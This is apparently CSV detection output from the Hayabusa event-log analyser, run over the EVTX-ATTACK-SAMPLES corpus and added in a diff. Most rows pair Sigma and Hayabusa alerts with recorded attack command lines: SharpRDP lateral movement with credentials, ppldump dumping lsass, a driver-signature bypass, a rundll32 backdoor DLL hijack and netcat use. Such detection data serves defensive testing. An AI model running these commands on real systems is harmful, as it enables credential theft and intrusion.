+2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe  computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password  :  Path: C:\ProgramData\USOShared\SharpRDP.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: Furutaka.exe  dummy2.sys  :  Path: C:\Users\Public\BYOV\TDL\Furutaka.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: ppldump.exe  -p lsass.exe -o a.png  :  Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-03-07 22:17:38.534 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\FullPowersTask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,-
+2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient  StartInteractiveScan  :  Path: C:\Windows\System32\UsoClient.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor  :  Path: C:\Windows\System32\rundll32.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: nc.exe  127.0.0.1 1337  :  Path: C:\Users\Public\Tools\nc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc  stop CDPSvc  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc  query CDPSvc  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications  :  Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  start CDPSvc  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1  start CDPSvc  :  Path: C:\Windows\System32\net1.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: net  start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: nc.exe  127.0.0.1 1337  :  Path: C:\Users\Public\Tools\nc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe  :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe *  :  Path: C:\Windows\System32\autochk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
